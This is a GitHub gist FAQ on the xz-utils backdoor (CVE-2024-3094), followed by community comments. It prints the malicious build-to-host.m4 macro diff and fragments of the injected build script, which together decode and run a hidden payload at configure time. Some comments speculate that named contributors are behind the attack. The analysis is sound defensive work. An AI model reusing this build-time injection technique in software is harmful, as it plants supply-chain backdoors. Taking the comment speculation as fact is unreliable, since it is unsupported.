@thesamesam
Last active January 2, 2025 15:08
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in it is written in good faith and is accurate to the best of our knowledge, but, as that implies, we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that provides lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed.

This backdoor is very indirect and only shows up when a few specific criteria are met. The criteria listed here are the ones known so far; others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. It has been seen being activated by such connections in the wild, resulting in performance issues, but we do not yet know what is required to bypass authentication (etc.) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.
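As a rough illustration of the version criterion above, the following sketch checks a version string against the two affected releases. The function names `is_backdoored_xz_version` and `extract_xz_version` are made up for this example, and the sketch only understands plain upstream version numbers. Distribution package versions may carry suffixes or downgrade markers that it does not interpret, so treat your distribution's advisory as the authority.

```shell
#!/bin/sh
# Hypothetical helper (not part of xz-utils): succeeds if the given
# upstream version string is one of the two affected releases.
is_backdoored_xz_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Hypothetical helper: print the first x.y.z number found in a line
# such as "xz (XZ Utils) 5.6.1".
extract_xz_version() {
    printf '%s\n' "$1" | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+' | head -n 1
}
```

One possible use is to pass in the version reported by your package manager, for example `is_backdoored_xz_version "$(extract_xz_version "$line")" && echo "affected release"`, where `$line` holds the version line you obtained.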

We know that the combination of systemd and patched openssh is vulnerable, but pending further analysis of the payload, we cannot be certain that other configurations aren't.

Without wanting to scaremonger, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc; they are just how the backdoor was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different from the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)
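To make the two bullets above concrete, here is a minimal sketch of the same kind of triplet test. It mirrors the intent the bullets describe, not the exact control flow of the malicious script, and the function name `triplet_is_targeted` is invented for this example.

```shell
#!/bin/sh
# Hypothetical helper: succeeds only for build triplets that start with
# x86_64 and end with linux-gnu, the combination described above.
triplet_is_targeted() {
    printf '%s\n' "$1" | grep -Eq '^x86_64' &&
    printf '%s\n' "$1" | grep -Eq 'linux-gnu$'
}
```

For example, `triplet_is_targeted x86_64-pc-linux-gnu` succeeds, while a triplet for another architecture, or one that does not end in linux-gnu, fails.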

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0
  fi

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.
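The packaging condition quoted above can be tried in isolation with a small sketch like the one below. The function name `looks_like_package_build` and its two arguments are assumptions made for illustration: the first stands in for `$srcdir` and the second for `$RPM_ARCH`.

```shell
#!/bin/sh
# Hypothetical helper: $1 plays the role of $srcdir, $2 the role of $RPM_ARCH.
# Succeeds if a debian/rules file exists in the source directory, or if the
# RPM architecture is x86_64, matching the condition quoted above.
looks_like_package_build() {
    test -f "$1/debian/rules" || test "x$2" = "xx86_64"
}
```

Note that this only tells you whether the quoted condition would hold for a given directory and variable value; it says nothing about whether a build was actually tampered with.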

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
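Two of the small building blocks in the diff above are easy to try on harmless input. The sketch below runs the `tr` expression assigned to `gl_path_map` and the `sed` expression used for `gl_[$1]_prefix` on made-up strings. The sample string and the file path are assumptions chosen for illustration, not data from the backdoor.

```shell
#!/bin/sh
# The character map assigned to gl_path_map in the diff above.
# It swaps tab with space and '-' with '_', so applying it twice
# restores the original text.
gl_path_map='tr "\t \-_" " \t_\-"'

# Made-up sample input for illustration.
sample='a-b_c d'
once=$(printf '%s' "$sample" | eval "$gl_path_map")
twice=$(printf '%s' "$once" | eval "$gl_path_map")
printf '%s\n' "$once"    # a_b-c<TAB>d
printf '%s\n' "$twice"   # a-b_c d

# The sed expression from the diff keeps only the text after the last dot.
# The path is a hypothetical example.
printf '%s\n' 'tests/files/example.xz' | sed "s/.*\.//g"   # xz
```

In the diff, the result of that `sed` expression is then used as a command name followed by `-d`, which is how a file extension ends up selecting the tool that decompresses the hidden data.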

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd; it is more of an unfortunate coincidence. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
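Since the points above hinge on whether liblzma ends up in the sshd process, a quick first check is to look for it among the libraries sshd is linked against. The sketch below is one way to do that; the function name `mentions_liblzma` is invented here, and it only inspects text fed to it on standard input (for example the output of `ldd`). It will not see libraries that a program loads later at runtime.

```shell
#!/bin/sh
# Hypothetical helper: reads dynamic-linker output (such as that of ldd)
# on stdin and succeeds if any line references liblzma.
mentions_liblzma() {
    grep -q 'liblzma\.so'
}
```

A possible invocation, assuming sshd is on your PATH, is `ldd "$(command -v sshd)" | mentions_liblzma && echo "sshd is linked against liblzma"`. A positive result only means the library is present in the process, not that the installed version is one of the affected ones.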

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse began the long work ahead of him.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either by themselves, or because changes were made to them to facilitate the xz backdoor). I want to avoid a witch-hunt, but I am listing some examples here which have already been widely linked, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.), or whether it can be said with certainty that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???
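For the item above about comparing upstream tarballs with the git tag, a first pass could simply list files that exist in the unpacked tarball but not in a tree exported from git. The sketch below does that; the function name `tarball_only_files` and the two-directory calling convention are assumptions made for this example. Expect plenty of legitimate hits (generated files such as configure scripts), so the output is a list to review, not a verdict. It also does not compare the contents of files present in both trees.

```shell
#!/bin/sh
# Hypothetical helper: $1 is an unpacked release tarball, $2 is a tree
# exported from the matching git tag. Prints the paths of regular files
# that exist only in the tarball.
tarball_only_files() {
    list_a=$(mktemp) || return 1
    list_b=$(mktemp) || { rm -f "$list_a"; return 1; }
    # Sort both listings in the C locale so comm sees consistent ordering.
    ( cd "$1" && find . -type f | LC_ALL=C sort ) > "$list_a"
    ( cd "$2" && find . -type f | LC_ALL=C sort ) > "$list_b"
    # comm -23 keeps lines unique to the first listing.
    LC_ALL=C comm -23 "$list_a" "$list_b"
    rm -f "$list_a" "$list_b"
}
```

The git side can be produced with `git archive` for the relevant tag and unpacked into a scratch directory before calling `tarball_only_files unpacked-tarball/ git-export/`.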

References and other reading material

@F1nny

F1nny commented Mar 30, 2024

Great writeup, props and good idea! @github's handling of the repo is unfortunate and hopefully rolled back soon, let's see what we can find out 🤞

@ITJamie

ITJamie commented Mar 30, 2024

One of the outcomes I'd like to see is systemd move away from xz completely and move to zstd or similar. xz was barely maintained pre 2022.

@Apsu

Apsu commented Mar 30, 2024

https://github.com/xz-mirror/xz interesting find. https://github.com/xz-mirror/xz/commits?author=JiaT75 is all over it, but at least the repo is viewable -- appears 7 months old.

https://git.tukaani.org/?p=xz.git;a=summary this is much more interesting though. Might be a viable candidate to clean from.

@Ninpo

Ninpo commented Mar 30, 2024

Does anyone know if Ubuntu 22.04 Server is affected, or what command I could run to know if I am affected? I'm not familiar with detecting installed library versions.

It's not affected, but to check you can dpkg -l | grep xz-utils to see the installed version. For rpm based distros, rpm -q xz or rpm -q xz-libs

@Benj2005

Great writeup, props and good idea! @github's handling of the repo is unfortunate and hopefully rolled back soon, let's see what we can find out 🤞

There seems to be a working mirror at https://git.tukaani.org/xz.git.
I found this from another PR made by the malicious committer - https://github.com/google/oss-fuzz/pull/11286.

@waterkip

It's not affected, but to check you can dpkg -l | grep xz-utils

apt-cache policy xz-utils is easier I think.

github's closure of the repo is insane, it prevents the world from inspecting the source code.

@nomad-geek

github's closure of the repo is insane, it prevents the world from inspecting the source code.

seriously dumb.

@StefanCristian

It's not affected, but to check you can dpkg -l | grep xz-utils

apt-cache policy xz-utils is easier I think.

github's closure of the repo is insane, it prevents the world from inspecting the source code.

You can still inspect the code on git.tukaani.org, some linux distributions still have automation pointed to that.

But the main problem is that Github doesn't have a procedure for:

  • Leaving discussions, reporting & possible patch proposals open
  • Forbidding code & tag fetch on a repo

In such situations it's imperative to leave the discussions & reporting open, while blocking code fetch. Not nuking everything.

What Github did is just terrible.

@AN4364364

AN4364364 commented Mar 30, 2024

@thesamesam, thank you very much for this document.

I have an odd observation, and I haven't been able to find an explanation so I'm going to ask it here. I noticed the JiaT75 Github account was following only 3 accounts. 2 were related to their project, but the third was yours, thesamesam. Why? Was it anything like the comment made by this Hacker News user, saying JiaT75 tried to persuade them to add the malicious code to Fedora? If your situation is similar, can you share what JiaT75 asked you to do?

https://news.ycombinator.com/item?id=39865810#39866275

To be super clear to everyone reading this, I am not leveling any accusations and I am grateful that thesamesam has provided so much to those of us trying to catch up.

@StefanCristian

StefanCristian commented Mar 30, 2024

@thesamesam, thank you very much for this document.

I have an odd observation, and I haven't been able to find an explanation so I'm going to ask it here. I noticed the JiaT75 Github account was following only 3 accounts. 2 were related to their project, but the third was yours, thesamesam. Why? Was it anything like the comment made by this Hacker News user, saying JiaT75 tried to persuade them to add the malicious code to Fedora? If your situation is similar, can you share what JiaT75 asked you to do?

https://news.ycombinator.com/item?id=39865810#39866275

To be super clear to everyone reading this, I am not leveling any accusations and I am grateful that thesamesam has provided so much to those of us trying to catch up.

Probably after this: https://bugs.gentoo.org/925415

In commit 72d2933bfae514e0dbb123488e9f1eb7cf64175f on xz.git main repo, Jia thanked Sam on 05.03.2024 for the bug report.
"Author: Jia Tan
Date: Tue Mar 5 00:34:46 2024 +0800

liblzma: Use attribute no_profile_instrument_function with ifunc.

Thanks to Sam James for determining this was the attribute needed to
workaround the GCC bug and for his version of the patch in Gentoo."

Sam is a Gentoo developer and maintainer. You can read the bug in question from the link above.
Edit: more like Sam asked Jia to fix the issues upstream, so that Gentoo can compile the package. Not the other way around.

@waterkip

You can still inspect the code on git.tukaani.org, some linux distributions still have automation pointed to that.

I know, but you cannot see the past, closed, or open PRs.

@jab4

jab4 commented Mar 30, 2024

Thanks everybody for spending their time on this and the folks at Debian for providing timely updates!

Speculation: Maybe Jia was trying a Proof of Concept after getting inspired by Alex Rider Season 2 in an attempt to roll the biggest distributed supercomputer on Earth — without creating a costly game studio empire as front, but instead by hijacking the FOSS community for free.

@gamer191

This commit/PR seems suspicious as well: https://github.com/google/oss-fuzz/pull/10667/files.

And it was made when 5.4.4 was the latest version of xz

Do you think that versions prior to 5.6.0 might have contained a different backdoor?
Related: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024

@herabit

herabit commented Mar 30, 2024

Really regretting taking my sleeptime meds right when I learned this occurred. A night of potential reverse engineering ruined! Keep up with the updates, they're greatly appreciated. It is bewildering to me that this kind of thing is even possible, not surprising, however nonetheless immensely bewildering.

@Krutonium

Really regretting taking my sleeptime meds right when I learned this occurred. A night of potential reverse engineering ruined! Keep up with the updates, they're greatly appreciated. It is bewildering to me that this kind of thing is even possible, not surprising, however nonetheless immensely bewildering.

Counter Point; Coffee

@mary-ext

mary-ext commented Mar 30, 2024

The fuck it isn't. This is why you don't allow overly complex bloatware (aka literally anything ever written by or involving Poettering) to reach its tendrils into every bit of your system. Complexity is the enemy of security.

Debian and other distributions patched in support for systemd-notify by relying on libsystemd, but realistically it didn't need to pull in libsystemd for said functionality.

As said in above comments, it also didn't need to be libsystemd specifically. liblzma is being pulled in by libselinux.

So it seems rather unproductive to put systemd at stake here, given that the backdoor would've happened anyway without the presence of systemd.

ghost commented Mar 30, 2024

@cloudhan

github's closure of the repo is insane, it prevents the world from inspecting the source code.

They are maybe just covering their ass for now, in case of a lawsuit over "helping/involving with the attack"

@oven8Mitts

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024

Unofficial discussions on Debian downgrading to 5.3.1

I count a minimum of 750 commits or contributions to xz by Jia Tan, who
backdoored it.

This includes all 700 commits made after they merged a pull request in Jan 7
2023, at which point they appear to have already had direct push access, which
would have also let them push commits with forged authors. Probably a number of
other commits before that point as well.

Reverting the backdoored version to a previous version is not sufficient to
know that Jia Tan has not hidden other backdoors in it. Version 5.4.5 still
contains the majority of those commits.

Commits by them such as 18d7facd3802b55c287581405c4d49c98708c136
and ae5c07b22a6b3766b84f409f1b6b5c100469068a show that they were deep
into analyzing the security of xz. They were well placed to insert a buffer
overflow that could allow eg, a targeted xz file to cause arbitrary code
execution. The impact of such a security hole could be much more stealthy and
bad than the known backdoor since it would allow chaining xz with other
unrelated software releases on an ongoing basis.

...

I'd suggest reverting to 5.3.1. Bearing in mind that there were security
fixes after that point for ZDI-CAN-16587 that would need to be reapplied.

@nhatzHK

nhatzHK commented Mar 30, 2024

Lasse Collin mentions Jia Tan in the commit logs for the first time in February 2022 and then semi-regularly afterwards.

liblzma: Minor addition to lzma_vli_size() API doc.
Thanks to Jia Tan.

In April 2022, a CVE for arbitrary file-writes affecting xzutils was found and reported.

All previous versions of gzip and xzutils are affected.

At that point Jia Tan had been thanked a couple times in the logs, including once for a patch but the commit was from Lasse Collin (probably squashed).

liblzma: Threaded decoder: Don't stop threads on LZMA_TIMED_OUT.
LZMA_TIMED_OUT is not an error and thus stopping threads on
LZMA_TIMED_OUT breaks the decoder badly.
Thanks to Jia Tan for finding the bug and for the patch.

It's possible nothing malicious happened yet at that point. Lasse Collin said the bug originated in gzip

This bug was inherited from gzip's zgrep. gzip 1.12 includes
a fix for zgrep.

In May 2022, Lasse Collin mentions that Jia Tan has been helping off-list with xz-utils

Jia Tan has helped me off-list with XZ Utils and he might have a bigger
role in the future at least with XZ Utils. It's clear that my resources
are too limited (thus the many emails waiting for replies) so something
has to change in the long term.

Jia Tan's first commit comes in on June 10 2022. (part of the diff)

+/// Since the output values of these functions are hardware dependent, these
+/// tests are trivial. They are simply used to detect errors and machines
+/// that these function are not supported on.

Only 19 days later, in June 2022, Lasse Collin mentions that Jia Tan could even be considered a co-maintainer at that point.

As I have hinted in earlier emails, Jia Tan may have a bigger role in
the project in the future. He has been helping a lot off-list and is
practically a co-maintainer already. :-) I know that not much has
happened in the git repository yet but things happen in small steps. In
any case some change in maintainership is already in progress at least
for XZ Utils.

Presumably Jia Tan has been helping a lot off-list before being added as a maintainer or gaining write access to the main branch. The latest completely untouched version is before 5.2. More traces of Jia Tan's involvement can be found once Microsoft (stops being typically Microsoft and) brings the repo back on here. If anyone needed more reasons to avoid github... But in any case just looking at the commits' author is not gonna be enough!

@gamer191

This 7 month old mirror looks legit: https://github.com/xz-mirror/xz

Important to note that, if I'm reading https://github.com/xz-mirror/xz/commits?author=JiaT75&after=74c3449d8b816a724b12ebce7417e00fb597309a+244 correctly, JiaT75 gained commit access in December 2022

On 22 June 2022 an account incorrectly assumed that Jia had commit access. I suspect that that was an alternate persona created by Jia, as a way of pressuring Lasse Collin into giving him commit access

@ZeroAurora

good writeup thanks. sharing this to my friends.
this is literally the most wtf moment in recent years for me

@xen0n

xen0n commented Mar 30, 2024

What about this Open PR tukaani-project/xz#86 with several force-push from 27 days ago?

I see the JiaT75 account working with another user account (xry111) on further CRC changes (CRC changes that are currently exploited), and that user has also contributed to many core Linux projects such as openssl, systemd, protobuf-c, llvm, util-linux, torvalds/linux, make-ca, cpython... xry111 has submitted PRs and commits and is also a reviewer of PRs in many places. 16 repos contributed to this year, 47 repos in 2023, 38 in 2024.

He seems to be participating in the Loongson Chinese architecture effort and Linux From Scratch, though, which might explain his wide contributions, but SSL, CRC, Make, building, kernel, curl, libxcrypt... that's a lot of places where he is contributing or reviewing code. Wouldn't that allow for very sophisticated, similar exploits?

I did not review all but I see some make-ca update to silence openssl warnings...

Wow, it's crazy how many different core areas of Linux code are being changed to cope with Loongson LoongArch.

From a quick glance, Rust and LLVM are modified in coordination between xry111 and also xen0n. That xen0n has contributed to something like 101 different repos last year. It seems he is also working on the Loongson architecture.

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.

For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.

As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.

Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

@Artoria2e5

Artoria2e5 commented Mar 30, 2024

And if you are trying to build a Debian or Red Hat package:

I would recommend rewording this to "building a package with dpkg or rpm". It's plausible to write and use rpm spec files without depending on the rest of the (whatever rpm distro you're using)'s package tree. It's less plausible to do the same with dpkg-buildpackage because it's a bigger bother to write debian/*, but is still possible.


@aspu https://git.tukaani.org/?p=xz.git;a=summary this is much more interesting though. Might be a viable candidate to clean from.

This is probably up-to-date with GitHub's version of the git tree. It does not have the fun stuff in the releases, but it does have the two test files.

The wayback machine at https://web.archive.org/web/20240226100419/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.gz (for full list, see here) gives sha512 1ef3cd3607818314e55b28c20263a9088d4b6e5362a45fbd37c17e799e26b4a7579928b99925ffe71e7804b0db2f65936f66a825bac9b23b7b0664f902925de8. This is consistent with https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5005868#gistcomment-5005868, but somehow not with https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5005854#gistcomment-5005854.

I think someone should more carefully document where the script comes from and how to extract it. I am a bit lost in Sam's comments as to which is which, since he presented two different SHA512s for the same filename.

(I saw a tweet with part of the extraction run manually. Involves a lot of head. Yeah... the pros are probably already on the ELF file, why should I worry now.)

@herzeleid02

Is there any news concerning the exploitation of this backdoor?

@Z-nonymous

Z-nonymous commented Mar 30, 2024

Guys, I know we can't read PRs in the xz repo anymore, but as I said earlier, PR tukaani-project/xz#86 was about actor JiaT75 coordinating with actor xry111 to, in their words, "completely fasten CRC manytimesfold".

Maybe the code in that particular PR is legit, BUT:

As per Andres Freund's original discovery, this exploit abuses the CRC routines. The same xry111 has also previously contributed to openssl (approving and reviewing others' PRs), and SSH is involved in the backdoor.

That actor is involved in so many PRs/commits/reviews in openssl, systemd, protobuf-c, llvm, util-linux, torvalds/linux, make-ca, cpython, curl, libxcrypt, dosbox-x, rust...
16 repos contributed to this year, 47 repos in 2023, 38 in 2024.
Some of his PRs are reviewed in conjunction with xen0n, or xry111 is reviewing PRs from him. xen0n has contributed to 36 repos this year, 101 in 2023 and 136 in 2024.

They are participating in adding support for the "Loongson" Chinese architecture, so that might explain their wide contributions, but everyone in their group https://github.com/loongson-community is accessing a large number of key open source projects.
Overall they cover such a wide range of open source projects: rust, nodejs, mozilla repos...

I'm not saying all PRs are suspicious, but an actor can certainly coordinate between these components, pushing a few changes here and there, to create a sophisticated exploit like the one shown here.

It's a Loong stretch, but Linux is powering something like $400-500B of Cloud/SaaS revenue, not counting all the standalone servers out there, and all of that powers a large portion of the world's economy; so a motivated bad actor can definitely afford to spend a couple of years making good contributions in order to obfuscate and backdoor Linux.

The sophistication of the current attack indicates that every package these folks contributed to needs a complete review of all their PRs and commits.

thanks @ozars for this link:
